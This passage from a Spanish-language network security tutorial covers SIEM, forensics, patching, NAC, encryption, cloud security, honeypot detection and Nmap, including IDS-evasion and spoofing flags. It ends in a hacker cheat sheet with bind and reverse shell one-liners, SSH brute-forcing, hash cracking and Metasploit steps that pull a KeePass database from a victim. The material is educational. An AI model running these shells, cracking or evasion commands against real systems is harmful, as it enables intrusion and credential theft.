- Falsos Positivos: Puede generar una gran cantidad de alertas, muchas de las cuales pueden ser falsos positivos, lo que aumenta la carga de trabajo del equipo de seguridad.
- Costos Elevados: Las soluciones SIEM suelen ser costosas en términos de licencia, implementación y mantenimiento.
Para saber más debes leer…
10. Herramientas de Análisis Forense de Red
Las herramientas de análisis forense de red permiten a los profesionales de la seguridad investigar incidentes de seguridad mediante la recolección, análisis y preservación de evidencias digitales. Estas herramientas son esenciales para entender cómo ocurrió un ataque, identificar al atacante y determinar la extensión del daño.
Funcionalidades Clave
- Captura de Datos: Permiten la captura y almacenamiento de tráfico de red en tiempo real para su posterior análisis.
- Análisis de Evidencias: Facilitan el análisis detallado de los datos capturados, ayudando a identificar patrones, técnicas de ataque y las fases del incidente.
- Preservación de Evidencias: Aseguran que las evidencias digitales se mantengan íntegras y no se alteren durante la investigación, lo cual es crucial para procedimientos legales.
Ejemplos Populares
- Wireshark: Aunque se usa principalmente como un analizador de paquetes, Wireshark también es muy útil para el análisis forense de redes, permitiendo la revisión detallada de tráfico capturado.
- Xplico: Una herramienta de análisis forense de red que reconstruye los datos de las comunicaciones interceptadas y permite un análisis exhaustivo del tráfico de red.
Ventajas y Desventajas
- Ventajas:
- Visibilidad Detallada: Proporcionan una visión profunda de lo que ha sucedido en la red, lo que es crucial para investigar incidentes complejos.
- Soporte Legal: La preservación adecuada de las evidencias permite que los datos recopilados se utilicen en procedimientos legales.
- Detección Post-Incidente: Ayuda a identificar las causas raíz de un incidente y a mejorar las defensas futuras.
- Desventajas:
- Requiere Conocimientos Especializados: El análisis forense de red es complejo y requiere una sólida comprensión de los protocolos de red y las técnicas de ataque.
- Tiempo y Recursos: Las investigaciones forenses pueden ser largas y consumir muchos recursos, lo que puede retrasar la recuperación de incidentes.
11. Sistemas de Gestión de Parches (Patch Management Systems)
Los sistemas de gestión de parches son herramientas diseñadas para administrar la aplicación de parches y actualizaciones de software en toda la red. Los parches son pequeñas piezas de software que corrigen vulnerabilidades, errores o fallos de seguridad en programas existentes. Mantener los sistemas actualizados con los últimos parches es esencial para prevenir ataques que exploten vulnerabilidades conocidas.
Funcionalidades Clave
- Detección de Vulnerabilidades: Identifica software desactualizado o con vulnerabilidades conocidas en la red.
- Automatización de Parches: Permite programar la aplicación automática de parches, minimizando el tiempo en que los sistemas permanecen vulnerables.
- Informe y Auditoría: Proporciona informes detallados sobre el estado de los parches en la red, permitiendo a los administradores asegurarse de que todos los sistemas están actualizados.
Ejemplos Populares
- Microsoft WSUS (Windows Server Update Services): Una herramienta para la gestión centralizada de parches en entornos Windows, permitiendo a los administradores aprobar, implementar y monitorizar actualizaciones.
- SolarWinds Patch Manager: Ofrece gestión de parches para sistemas Windows y aplicaciones de terceros, con capacidades de automatización y informes detallados.
Ventajas y Desventajas
- Ventajas:
- Mitigación de Vulnerabilidades: Reduce significativamente el riesgo de ataques al mantener los sistemas actualizados con las últimas correcciones de seguridad.
- Ahorro de Tiempo: Automatiza la aplicación de parches, liberando a los administradores de TI para que se concentren en otras tareas críticas.
- Cumplimiento Normativo: Ayuda a cumplir con las normativas de seguridad que exigen que los sistemas estén actualizados y protegidos contra vulnerabilidades conocidas.
- Desventajas:
- Riesgo de Incompatibilidad: Los parches pueden a veces causar problemas de compatibilidad con aplicaciones existentes, lo que puede interrumpir el servicio.
- Requiere Supervisión: Aunque la automatización es útil, los parches deben ser probados y supervisados para asegurar que no causen problemas en el entorno de producción.
- Posibles Falsos Positivos: Algunos sistemas pueden marcar incorrectamente el software como actualizado o desactualizado, lo que podría llevar a la exposición de vulnerabilidades.
12. Sistemas de Control de Acceso a la Red (NAC)
Los sistemas de Control de Acceso a la Red (NAC) son herramientas que controlan y protegen el acceso a la red al garantizar que solo los dispositivos autorizados y compatibles puedan conectarse. NAC evalúa la seguridad de los dispositivos que intentan conectarse a la red, verificando aspectos como las actualizaciones de software, la presencia de antivirus y otras políticas de seguridad antes de otorgar acceso.
Funcionalidades Clave
- Verificación de Cumplimiento: Evalúa si los dispositivos cumplen con las políticas de seguridad de la empresa antes de permitirles acceder a la red.
- Autenticación de Usuarios y Dispositivos: Requiere que los usuarios y dispositivos se autentiquen de forma segura antes de conectarse a la red.
- Segregación de la Red: Puede asignar dispositivos a diferentes segmentos de la red basados en su nivel de seguridad y permisos de acceso.
Ejemplos Populares
- Cisco Identity Services Engine (ISE): Una solución NAC que ofrece visibilidad total de los usuarios y dispositivos en la red, y aplica políticas de acceso basado en identidad.
- ForeScout: Proporciona control de acceso a la red, visibilidad de dispositivos y respuesta automatizada a amenazas.
Ventajas y Desventajas
- Ventajas:
- Protección de Red: Evita que dispositivos no seguros accedan a la red, lo que reduce el riesgo de ataques y la propagación de malware.
- Visibilidad Completa: Ofrece una visibilidad detallada de todos los dispositivos que intentan acceder a la red, permitiendo una gestión más eficiente.
- Cumplimiento de Políticas: Asegura que solo los dispositivos que cumplen con las políticas de seguridad corporativas puedan acceder a los recursos de la red.
- Desventajas:
- Complejidad de Implementación: La configuración de un sistema NAC puede ser compleja y requerir una planificación detallada.
- Costos: Las soluciones NAC avanzadas pueden ser costosas de implementar y mantener, especialmente en grandes organizaciones.
- Interrupciones Potenciales: Los dispositivos legítimos que no cumplen completamente con las políticas de seguridad pueden ser bloqueados, causando interrupciones en el trabajo.
13. Herramientas de Cifrado
Las herramientas de cifrado son esenciales para proteger la confidencialidad de los datos, tanto en reposo como en tránsito. Estas herramientas aplican algoritmos de cifrado para convertir los datos en un formato ilegible para cualquier persona que no tenga la clave de descifrado correspondiente.
Tipos de Cifrado
- Cifrado Simétrico: Utiliza una única clave para cifrar y descifrar los datos. Es rápido y eficiente, pero la seguridad depende de mantener la clave secreta.
- Cifrado Asimétrico: Utiliza un par de claves (una pública y una privada). La clave pública cifra los datos, y solo la clave privada correspondiente puede descifrarlos.
- Cifrado de Disco Completo: Protege todos los datos en un disco duro cifrando todo el contenido, lo que asegura que los datos no puedan ser accedidos sin la clave de cifrado.
Ejemplos Populares
- BitLocker: Una herramienta de cifrado de disco completo disponible en Windows, que protege los datos del usuario en caso de pérdida o robo del dispositivo.
- VeraCrypt: Una herramienta de cifrado de código abierto que permite cifrar particiones de disco, unidades externas y archivos individuales.
Ventajas y Desventajas
- Ventajas:
- Protección de Datos: Garantiza que los datos sean inaccesibles para personas no autorizadas, incluso si se interceptan o roban los dispositivos de almacenamiento.
- Cumplimiento Normativo: Ayuda a las organizaciones a cumplir con las normativas de protección de datos, como GDPR.
- Flexibilidad: Ofrece múltiples opciones de cifrado para diferentes necesidades, desde el cifrado de archivos individuales hasta el cifrado de discos completos.
- Desventajas:
- Impacto en el Rendimiento: El cifrado puede reducir el rendimiento del sistema, especialmente durante las operaciones intensivas en datos.
- Riesgo de Pérdida de Clave: Si se pierde la clave de cifrado, los datos cifrados pueden ser irrecuperables.
- Complejidad de Gestión: La gestión de claves y la implementación de políticas de cifrado puede ser compleja, especialmente en grandes entornos corporativos.
14. Plataformas de Seguridad en la Nube
Las plataformas de seguridad en la nube ofrecen una gama de herramientas diseñadas para proteger los entornos de nube, que incluyen la infraestructura, las aplicaciones y los datos. Estas plataformas abordan desafíos únicos de la nube, como la protección de datos en múltiples ubicaciones, la gestión de identidades y el control de acceso.
Funcionalidades Clave
- Protección de Datos: Asegura que los datos almacenados en la nube estén cifrados y que su acceso esté controlado adecuadamente.
- Gestión de Identidades y Accesos (IAM): Controla quién tiene acceso a qué recursos en la nube, asegurando que solo las personas autorizadas puedan acceder a los datos y servicios.
- Monitoreo y Detección de Amenazas: Proporciona visibilidad en tiempo real de las actividades en la nube, permitiendo la detección y respuesta a amenazas de manera proactiva.
Ejemplos Populares
- Microsoft Azure Security Center: Una solución integrada que proporciona monitoreo de seguridad, evaluación de cumplimiento y protección avanzada contra amenazas para los recursos de Azure.
- AWS Security Hub: Ofrece un panel centralizado para gestionar y visualizar la seguridad en los servicios de AWS, integrando alertas de múltiples herramientas de seguridad.
Ventajas y Desventajas
- Ventajas:
- Escalabilidad: Las soluciones de seguridad en la nube se escalan fácilmente con la infraestructura de la nube, adaptándose a las necesidades de la organización.
- Integración: Estas plataformas suelen integrarse de manera fluida con otros servicios de nube, proporcionando una gestión de seguridad centralizada.
- Automatización: Facilitan la automatización de tareas de seguridad, como la aplicación de políticas de acceso y la respuesta a incidentes.
- Desventajas:
- Dependencia del Proveedor: La seguridad en la nube depende en gran medida de la confianza en el proveedor de servicios de nube.
- Visibilidad Limitada: En algunos casos, las organizaciones pueden tener visibilidad limitada sobre la infraestructura subyacente, lo que dificulta la detección de amenazas.
- Costos: Los costos asociados con las plataformas de seguridad en la nube pueden aumentar rápidamente a medida que se utilizan más servicios y recursos.
15. Honeypots
Los honeypots son una tecnología clave en la seguridad informática diseñada para atraer a los atacantes y estudiar sus técnicas. Actúan como señuelos, simulando ser vulnerables para engañar a los hackers y permitir que los defensores analicen sus métodos sin comprometer sistemas reales. Los honeypots recopilan datos sobre los intentos de ataque, lo que proporciona información valiosa sobre nuevas amenazas y tácticas empleadas por los atacantes.
Es un equipo falso modificado para tomar información de los intrusos. El nombre, los procesos del sistema, las cuentas de usuario y archivos, todo está diseñado para atraer a los atacantes. Son señuelos que parecen contener vulnerabilidades que los hacen atractivos para los hackers.
El objetivo de estos sistemas es proteger el acceso a los datos reales, los controles de administración y equipos. Permite recopilar datos sobre la identidad, el acceso y métodos de ataque utilizados. Se puede observar cómo el intruso intenta explotar datos y evadiendo los sistemas de seguridad
Ventajas:
- Parar los ataques.
- Detectar ataques.
- Educar.
- Crear confusión.
Para comprender el nivel de ataque logrado, es común guardar una imagen de los binarios del sistema utilizando una utilidad como Tripwire y almacenarla de manera remota. Si el “honeypot” está comprometido, es útil detenerlo y volver a configur
Tipos de Honeypots
- Honeypots de Producción: Se integran en redes de producción reales y tienen como objetivo detectar y mitigar ataques en tiempo real. Son útiles para proteger sistemas críticos y alertar sobre actividades sospechosas.
- Honeypots de Investigación: Diseñados principalmente para recopilar información y entender las técnicas de ataque, sin estar integrados en un entorno de producción. Se utilizan en entornos controlados para estudiar a los atacantes y sus herramientas, lo que ayuda a mejorar las defensas de seguridad.
- High-Interaction Honeypots: Simulan sistemas completos con múltiples servicios y aplicaciones, lo que permite a los atacantes interactuar con ellos de manera profunda. El intruso interactúa con un sistema completo. A mayor nivel de interacción, mayor es la cantidad de información que se puede obtener. PERO un sistema completo supone un mayor riesgo.
- Ventaja: Ofrecen una visión detallada de las tácticas de los atacantes.
- Desventaja: Pueden ser costosos de mantener y, si no se manejan correctamente, los atacantes podrían usarlos para lanzar ataques a otros sistemas.
- Low-Interaction Honeypots: Emulan solo un número limitado de servicios o aplicaciones, lo que reduce la complejidad y el riesgo de que el honeypot sea explotado. El intruso interactúa de manera limitada con un sistema simple o un “escuchador” de actividad en determinados puertos.
- Ventaja: Son más fáciles de desplegar y mantener.
- Desventaja: Proporcionan menos información detallada sobre los ataques.
Clasificación
- Honeypots físicos.
- Honeypots virtuales.
Implementación de Honeypots
- Configuración
- Objetivo: Definir claramente qué tipo de ataque se desea estudiar y configurar el honeypot en consecuencia. Esto incluye la elección de servicios que atraerán a los atacantes y la configuración de las alertas para notificar sobre cualquier actividad sospechosa.
- Herramientas: Herramientas como Honeyd, Cowrie y Dionaea son populares para configurar honeypots tanto de baja como de alta interacción.
- Monitoreo
- Descripción: Es esencial monitorear constantemente el honeypot para capturar la actividad de los atacantes. Esto implica revisar los registros, analizar patrones de tráfico y ajustar las configuraciones en función de las tácticas observadas.
- Análisis de Datos: Los datos recolectados deben ser analizados para identificar nuevos métodos de ataque, que luego pueden ser utilizados para mejorar las defensas en la red real.
- Seguridad del Honeypot
- Aislamiento: Es crucial aislar el honeypot de los sistemas críticos para evitar que un atacante lo utilice como un trampolín para comprometer otros sistemas en la red.
- Gestión de Riesgos: Establecer políticas para manejar los datos obtenidos, asegurándose de que la información sensible no esté expuesta ni comprometida a través del honeypot.
Ventajas y Desventajas de los Honeypots
Ventajas
- Detección Temprana: Permiten la detección temprana de nuevas amenazas y vectores de ataque antes de que comprometan sistemas reales.
- Información Detallada: Proporcionan un flujo constante de datos sobre tácticas, técnicas y procedimientos (TTPs) utilizados por los atacantes.
- Reducción de Falsos Positivos: Como los honeypots no deben recibir tráfico legítimo, cualquier actividad detectada es probablemente maliciosa, lo que reduce la cantidad de falsos positivos.
Desventajas
- Riesgo de Explotación: Si un honeypot no está correctamente aislado, un atacante podría utilizarlo para lanzar ataques contra otras partes de la red.
- Mantenimiento: Los honeypots requieren una gestión constante para asegurar que sigan siendo efectivos y que no introduzcan vulnerabilidades en el entorno de red.
- Legalidad y Ética: Capturar datos de atacantes puede tener implicaciones legales y éticas, especialmente si se recolecta información personal o si se provoca un contraataque.
Casos de Uso de Honeypots
- Investigación y Desarrollo
- Uso: Honeypots de alta interacción son utilizados por investigadores de seguridad para estudiar las últimas tácticas de ataque en un entorno controlado. Esto ayuda a desarrollar nuevas técnicas de defensa y parchear vulnerabilidades.
- Detección de Amenazas Internas
- Uso: Honeypots pueden ser desplegados en redes corporativas para detectar movimientos laterales y actividades sospechosas realizadas por empleados malintencionados o por dispositivos comprometidos dentro de la red.
- Protección de Infraestructura Crítica
- Uso: En infraestructuras críticas, como plantas de energía o redes financieras, los honeypots pueden ayudar a identificar y neutralizar ataques antes de que alcancen sistemas sensibles.
Herramientas Populares para Honeypots
- Honeyd
- Descripción: Es una herramienta de código abierto para crear honeypots de baja interacción que simulan redes enteras. Honeyd puede emular múltiples sistemas operativos y servicios, lo que lo convierte en una herramienta versátil para estudios de seguridad.
- Cowrie
- Descripción: Un honeypot de alta interacción diseñado principalmente para SSH y Telnet. Cowrie es capaz de registrar sesiones de ataque completas, lo que proporciona información detallada sobre los métodos de los atacantes.
- Dionaea
- Descripción: Enfocado en capturar exploits y malware que se propagan a través de redes. Dionaea es útil para estudiar el comportamiento de los ataques y cómo se distribuye el malware en un entorno de red.
- Glastopf
- Descripción: Un honeypot de aplicación web que emula vulnerabilidades web comunes para atraer atacantes que explotan fallas como SQL Injection y RFI/LFI. Glastopf registra estos intentos y permite a los investigadores estudiar las técnicas de explotación utilizadas.
Estrategias de Implementación de Honeypots
- Segmentación de Red
- Estrategia: Implementar honeypots en diferentes segmentos de la red, como DMZs y redes internas, para atraer diferentes tipos de ataques y obtener una visión más completa de las amenazas.
- Cebo Específico
- Estrategia: Configurar honeypots para simular servicios específicos que sean atractivos para los atacantes, como bases de datos financieras o sistemas de control industrial (ICS). Esto permite centrarse en las amenazas más relevantes para la organización.
- Implementación en la Nube
- Estrategia: Desplegar honeypots en entornos de nube para detectar y analizar ataques que aprovechan vulnerabilidades en servicios de nube, como configuraciones incorrectas o credenciales comprometidas.
Honeynet
Es una combinación de varios honeypots operando juntos en una red. A diferencia de las emulaciones utilizadas en otros honeypots, Honeynet emplea sistemas completos para atraer y analizar ataques. utiliza sistemas completos detrás de un método de control de acceso, como un cortafuego, para atraer y analizar intentos de intrusión. Al ser sistemas completos, pueden ser reconocidos, atacados y explotados totalmente.
Estos sistemas pueden incluir cualquier sistema operativo encontrado en servidores en producción. ofrece todas las funcionalidades de otros honeypots, permitiendo detectar ataques y monitorizar todos los protocolos IP. es capaz de capturar amenazas desconocidas, convirtiéndolo en una valiosa herramienta de investigación para determinar la identidad de los atacantes, las herramientas que utilizan y las tácticas empleadas.
Hay tres aspectos fundamentales en una arquitectura Honeynet
- Control de datos.
- Captura de datos.
- Recogida de información.
Tecnologías de virtualización como VirtualBox facilitan la creación de Honeynets y reducen significativamente los costes. Estas permiten guardar copias de las máquinas virtuales en un estado específico, lo que facilita la recuperación de las mismas en caso de ser comprometido, evitando la necesidad de reinstalar el sistema desde cero y ahorrando tiempo.
Al concluir este capítulo vital sobre Mecanismos de Seguridad, te hemos equipado con las herramientas necesarias para proteger tus redes en el mundo digital. La seguridad es un viaje continuo, y ahora posees una comprensión sólida para enfrentar los desafíos venideros. Implementa estas estrategias y construye una infraestructura digital robusta.
Cómo detectar un honeypot
Servicios de sonda que se ejecutan en ellos; Los puertos que muestran que un servicio está disponible, pero niegan un protocolo de enlace de tres vías pueden indicar que el sistema es un honeypot .
- Capa 7 (Aplicación) : Examinar la latencia de las respuestas del servidor
- Capa 4 (Transporte) : examina el tamaño de las ventanas TCP y busca el reconocimiento continuo de los paquetes entrantes incluso cuando el tamaño de las ventanas está establecido en 0.
- Capa 2 (enlace de datos) : si está en la misma red que el honeypot, busque direcciones MAC en los paquetes que indiquen la presencia de un “agujero negro” ( 0:0:f:ff:ff:ff)
- Si Honeypot está virtualizado, busque los rangos de direcciones MAC asignados por el proveedor según lo publicado por IEEE.
- Si Honeypot es del tipo Honeyd , utilice métodos de huellas digitales TCP basados en el tiempo para detectar
- Detectar honeypot de modo usuario de Linux (UML) , analizarlo proc/mountsy proc/interruptsque proc/cmdlinetendría configuraciones e información específicas de UML.
- Al detectar honeypots basados en Sebek, Sebek registrará todo a lo que se acceda read() antes de enviarlo a la red, lo que provoca una congestión que puede ser un indicador.
- Detectar honeypots snort_inline , analizar los paquetes salientes capturando los paquetes modificados snort_inline a través de otro
Nmap: Herramienta Esencial para la Seguridad de Redes
Nmap (Network Mapper) es una herramienta de código abierto utilizada principalmente para el escaneo de redes y auditorías de seguridad. Originalmente desarrollado por Gordon Lyon (alias “Fyodor”), Nmap se ha convertido en una herramienta indispensable para administradores de sistemas, ingenieros de redes y hackers éticos. Su capacidad para descubrir hosts activos, identificar servicios y detectar vulnerabilidades la convierte en una pieza fundamental del arsenal de cualquier profesional de la seguridad.
Zenmap: interfaz gráfica, facilita la configuración del escaneo. Organiza y muestra la información de Nmap de forma ordenada, indicando los puertos abiertos, servicios y versiones de software detectadas. Zenmap guarda los resultados obtenidos. Posteriormente estos resultados podrán ser comparados con escaneos posteriores a través de otra herramienta proporcionada por Zenmap.
Para saber más debes leer…
Características de Nmap:
- Flexibilidad: permite mapear redes con diversas técnicas, incluso cuando están protegidas por cortafuegos o filtros de paquetes, incluyendo escaneo de puertos e identificación de sistemas operativos, versiones, etc.
- Potencia: utilizado en redes con cientos de miles de hosts conectados.
- Documentación: amplia documentación en varios idiomas, accesible desde http://nmap.org/docs.html.
perfiles más intensos envían más peticiones a los hosts objetivo, lo que aumenta la probabilidad de ser detectado por herramientas de seguridad. Para conocer máquinas conectadas a un sector de red, se recomienda usar un “Ping Scan” o “Quick Scan”. este es un paso previo común en ataques de obtención de información.
Para un examen exhaustivo de seguridad, se puede optar por una opción de escaneo intenso. Nmap
Escaneo de puertos
El escaneo de puertos es un proceso de comprobación de una computadora, un servidor u otro host de red para conocer los puertos abiertos. En redes, a cada aplicación que se ejecuta en un dispositivo se le asigna un identificador llamado número de puerto. Este número de puerto se utiliza en ambos extremos de la transmisión para asegurar que los datos estén llegando a la aplicación correcta.
El escaneo de puertos se puede utilizar con fines maliciosos como una herramienta de reconocimiento, para identificar el sistema operativo y los servicios que se ejecutan en una computadora o un host, o se puede utilizar inofensivamente por parte de un administrador de red para verificar las políticas de seguridad en la red.
Con el propósito de evaluar el firewall de la red de computadoras y la seguridad de los puertos, puede utilizar una herramienta de escaneo de puertos, como Nmap, para encontrar todos los puertos abiertos en su red.
El escaneo de puertos se puede considerar como precursor para un ataque a la red y, por lo tanto, no debe realizarse en servidores públicos en Internet o en la red de una empresa sin permiso.
Para saber más debes leer…
Funcionalidades Básicas de Nmap
- Descubrimiento de Hosts
- Descripción: Nmap puede identificar dispositivos activos en una red, lo que es esencial para crear un inventario de activos de red.
- Comando Ejemplo:
nmap -sn 192.168.1.0/24
– Realiza un escaneo para descubrir hosts en la subred 192.168.1.0/24 sin realizar un escaneo de puertos.
- Escaneo de Puertos
- Descripción: Nmap puede escanear puertos en hosts específicos para determinar qué servicios están en ejecución. Esto es crucial para identificar posibles puntos de entrada en un sistema.
- Comando Ejemplo:
nmap -p 1-65535 192.168.1.1
– Escanea todos los puertos en el host 192.168.1.1.
- Detección de Servicios
- Descripción: Nmap puede identificar los servicios que se ejecutan en puertos abiertos y sus versiones. Esta información ayuda a identificar servicios vulnerables.
- Comando Ejemplo:
nmap -sV 192.168.1.1
– Detecta versiones de servicios en el host especificado.
- Detección de Sistemas Operativos
- Descripción: Nmap es capaz de identificar el sistema operativo de un host, lo que puede proporcionar información sobre posibles vulnerabilidades específicas del sistema.
- Comando Ejemplo:
nmap -O 192.168.1.1
– Intenta identificar el sistema operativo del host 192.168.1.1.
Funcionalidades Avanzadas de Nmap
- Escaneo de Red Completo
- Descripción: Nmap puede realizar un escaneo completo de la red para identificar no solo los dispositivos activos, sino también sus sistemas operativos, servicios, y posibles vulnerabilidades.
- Comando Ejemplo:
nmap -A 192.168.1.0/24
– Realiza un escaneo avanzado que incluye detección de servicios, sistema operativo, y script scanning en toda la subred.
- Escaneo de Puertos UDP
- Descripción: A diferencia del escaneo TCP, el escaneo UDP puede identificar servicios que utilizan el protocolo UDP, que a menudo son ignorados en auditorías de seguridad.
- Comando Ejemplo:
nmap -sU 192.168.1.1
– Escanea los puertos UDP en el host especificado.
- Escaneo de Scripts (NSE – Nmap Scripting Engine)
- Descripción: Nmap incluye un motor de scripting que permite ejecutar scripts para detección avanzada de vulnerabilidades, análisis de políticas de seguridad, y más.
- Comando Ejemplo:
nmap --script vuln 192.168.1.1
– Ejecuta scripts que buscan vulnerabilidades conocidas en el host especificado.
- Evasión de Cortafuegos
- Descripción: Nmap tiene capacidades avanzadas para evadir firewalls y sistemas de detección de intrusos (IDS), permitiendo que los escaneos pasen desapercibidos.
- Comando Ejemplo:
nmap -f -D RND:10 192.168.1.1
– Fragmenta los paquetes y utiliza decoys para evadir la detección durante el escaneo.
Interruptores útiles para evadir y sigiloso :
Conmutador Nmap | Información |
-v | Nivel verboso |
-sS | Escaneo TCP SYN |
-T | Plantilla de tiempo para realizar el escaneo |
-f | Utilice paquetes IP fragmentados |
-f –mtu | Utilice paquetes fragmentados y configure MTU |
-D | Dirección IP Señuelo: <decoy1,decoy2[,ME],…>: Ocultar un escaneo con señuelos |
-S | Falsificar la dirección IP de origen |
–send-eth | Asegura que usemos paquetes de nivel Ethernet, sin pasar por la capa IP y enviando tramas Ethernet sin procesar dentro del flujo. |
–data-length | Especificar la longitud de los datos/marco |
–source-port | Especifique un puerto aleatorio con el que desea comunicarse |
Ejemplo:
•Envía paquetes fragmentados IPv4 de 50 bytes; los paquetes son demasiado pequeños para enviar datos y detectarlos como una técnica de sondeo/exploración:
nmap -v -sS -f -mtu 32 –send-eth –data-length 50 –source-port 8965 -T5 192.168.0.22
⚠️ La fragmentación es el corazón de las técnicas de evasión de IDS/Firewall.⚠️
Para saber más debes leer…
Ejemplos Prácticos del Uso de Nmap
- Auditoría de Seguridad de Red
- Escenario: Un administrador de red desea realizar una auditoría de seguridad para identificar servicios obsoletos y potencialmente vulnerables.
- Comando:
nmap -sV --script vuln 192.168.1.0/24
– Escanea la red para detectar versiones de servicios y buscar vulnerabilidades conocidas.
- Monitoreo de Dispositivos IoT
- Escenario: Un profesional de seguridad desea verificar la seguridad de dispositivos IoT en la red para asegurarse de que no están expuestos a amenazas externas.
- Comando:
nmap -sU -O -p 161 192.168.1.100-150
– Escanea puertos UDP típicamente utilizados por dispositivos IoT y detecta su sistema operativo.
- Simulación de Ataques para Evaluar la Resiliencia
- Escenario: Un hacker ético simula un ataque para evaluar cómo una red corporativa resistiría un intento de intrusión.
- Comando:
nmap -A -f -T4 -D RND:5,192.168.1.55,192.168.1.56 192.168.1.1
– Realiza un escaneo avanzado con técnicas de evasión para simular un ataque dirigido.
Escaneo de red
ARP SCAN: |
---|
# nmap -n -sn -PR 10.5.23.0/24 |
ESCANEAR EN BUSCA DE VULNERABILIDADES (FILTRO DE CATEGORÍA DE SCRIPT): |
---|
# nmap -n -Pn –script “vuln and safe” |
10.5.23.0/24 |
OPCIONES ÚTILES DE NMAP: |
---|
-n: Disable name and port resolution |
-PR: ARP host discovery |
-Pn: Disable host discovery |
-sn: Disable port scan (host discovery only) |
-sS/-sT/-sU: SYN/TCP connect/UDP scan |
–top-ports 50: Scan 50 top ports |
-iL file: Host input file |
-oA file: Write output files (3 types) |
-sC: Script scan (default scripts) |
–script : Specific scripts |
-sV: Version detection |
-6: IPv6 scan |
BÚSQUEDA DNS INVERSA DEL RANGO IP: |
---|
# nmap -sL 10.5.23.0/24 |
ESCANEO TCP (ESCANEO SINCRONIZADO = ESCANEO MEDIO ABIERTO): |
---|
# nmap -Pn -n -sS -p |
22,25,80,443,8080 10.5.23.0/24 |
ESCANEAR EN BUSCA DE HOST VULNERABLES DE ETERNALBLUE: |
---|
# nmap -n -Pn -p 443 –script smbvuln- |
ms17-010 10.5.23.0/24 |
SINTONIZACIÓN DE RENDIMIENTO (1 SYN PACKET ≈ 60 BYTES → 20’000 PACKETS/S ≈ 10 MBPS): |
---|
# nmap -n -Pn –min-rate 20000 |
10.5.23.0/24 |
DESCUBRIMIENTO DE HOST NMAP (ARP, ICMP, SYN 443/TCP, ACK 80/TCP): |
---|
# nmap -sn -n 10.5.23.0/24 |
LISTA DE SCRIPTS NMAP: |
---|
# ls /usr/share/nmap/scripts |
El objetivo se puede especificar mediante notación CIDR (10.5.23.0/24) o definiciones de rango (10.13-37.5.1-23).
Para saber más debes leer…
Nmap para hackers
Para ejecutar el escaneo de puertos Nmap de una computadora en la red doméstica local, descargue y ejecute un programa como Zenmap, proporcione la dirección IP de destino de la computadora que desea analizar, elija un perfil de escaneo predeterminado y presione Escanear.
El escaneo de Nmap reportará cualquier servicio que se esté ejecutando (como servicios web, servicios de correo, etc.) y los números de puerto. El escaneo de puertos generalmente provoca alguna de estas tres respuestas:
- Abierto o aceptado: el host respondió e indicó que hay un servicio activo en el puerto.
- Cerrado, denegado o no escucha: el host respondió e indicó que se denegarán las conexiones en el puerto.
- Filtrado, caído o bloqueado: no hubo respuesta del host.
Para ejecutar escaneo del puerto desde fuera de la red, deberá iniciar el escaneo desde fuera de la red. Esto implicará la ejecución de un escaneo de puertos de Nmap con la dirección IP pública del firewall o router. Para obtener su dirección IP pública, utilice un motor de búsqueda, como Google, con la consulta “cuál es mi dirección IP”.
El motor de búsqueda le devolverá su dirección IP pública. Para ejecutar un escaneo de los seis puertos más comunes de un router o firewall doméstico, vaya al escáner de puertos en línea de Nmap en https://hackertarget.com/nmap-online-port-scanner/ e ingrese su dirección IP pública en el cuadro del formulario: dirección IP para escanear… y presione Escaneo rápido de Nmap.
Si la respuesta es Abierta para cualquiera de los puertos: 21, 22, 25, 80, 443 o 3389, lo más probable es que esté habilitado.
Nmap y la Ética en la Seguridad
El uso de Nmap en el ámbito de la seguridad de redes está asociado con consideraciones éticas y legales. Aunque Nmap es una herramienta poderosa, su uso indebido puede constituir un delito, dependiendo de la jurisdicción. Es vital que los profesionales de seguridad y los hackers éticos sigan las mejores prácticas, como obtener permisos explícitos antes de escanear sistemas que no les pertenecen y utilizar la herramienta exclusivamente para fines educativos, de investigación, o bajo contratos específicos de pruebas de penetración.
Más de 30 OSINT Network Analysis Tools
Shells y Scripts de Red para hackers
Shells
INICIAR BIND SHELL (EN LA VÍCTIMA: |
---|
# ncat -l -p 2305 -e “/bin/bash -i” |
ESCUCHA EL SHELL INVERTIDO (EN EL ATACANTE): |
---|
# ncat -l -p 23 |
INICIAR EL SHELL INVERTIDO SÓLO CON BASH (EN LA VÍCTIMA): |
---|
# bash -i &>/dev/tcp/10.5.23.5/42 0>&1 |
CONECTARSE A BIND SHELL (EN EL ATACANTE): |
---|
# ncat 10.5.23.42 2305 |
INICIAR CONCHA INVERSA (EN LA VÍCTIMA): |
---|
# ncat -e “/bin/bash -i” 10.5.23.5 23 |
ACTUALIZACIÓN A PSEUDO TERMINAL: |
---|
# python -c ‘import pty; |
pty.spawn(“/bin/bash”)’ |
Bases de datos de vulnerabilidad y exploits
BÚSQUEDA DE EXPLOIT (COPIA LOCAL DE EXPLOIT-DB): |
---|
# searchsploit apache |
MOSTRAR LA RUTA DEL ARCHIVO EXPLOTAR Y COPIARLA EN EL PORTAPAPELES: |
---|
# searchsploit -p 40142 |
BASES DE DATOS DE VULNERABILIDAD Y EXPLOTACIÓN EN LÍNEA: |
---|
cvedetails.com, exploit-db.com, |
packetstormsecurity.com |
Cracking
PRUEBA CONTRASEÑAS SSH DE UNA LISTA DE PALABRAS: |
---|
# ncrack -p 22 –user root -P |
./passwords.txt 10.5.23.0/24 |
CRACK HASHES (Ejemplo: 5600 para tipo NETNTLMV2): |
---|
# hashcat -m 5600 -a 0 hash.txt |
/path/to/wordlists/* |
DETERMINAR EL TIPO DE HASH: |
---|
# hashid 869d[…]bd88 |
MUESTRA TIPOS DE HASH DE EJEMPLO PARA HASHCAT: |
---|
# hashcat –example-hashes |
CRACK HASHES USANDO JOHN THE RIPPER: |
---|
# john hashes.txt |
Metasploit Framework
INICIAR METASPLOIT: |
---|
# msfconsole |
USE EXPLOIT: |
---|
msf > use exploit/windows/smb/ms17_… |
CONFIGURAR EXPLOTACIÓN: |
---|
msf exploit(…) > show options |
msf exploit(…) > set TARGET 10.5.23.42 |
REVERSE SHELL LISTENER: |
---|
> use exploit/multi/handler |
> set payload |
linux/x64/shell_reverse_tcp |
> set LHOST 10.5.23.42 # attacker |
> set LPORT 443 |
> exploit |
SUBIR/DESCARGAR ARCHIVOS: |
---|
meterpreter > upload pwn.exe |
meterpreter > download c:\keepass.kdb |
SESIÓN DE ANTECEDENTES DE METERPRETER: |
---|
meterpreter > background |
SOCKS MEDIANTE METERPRETER (REQUIERE AUTOROUTE): |
---|
> use auxiliary/server/socks4a |
> set SRVPORT 8080 |
> run |
CONÉCTATE A TRAVÉS DE SOCKS PROXY: |
---|
# proxychains ncat 172.23.5.42 1337 |
BUSCAR EXPLOIT: |
---|
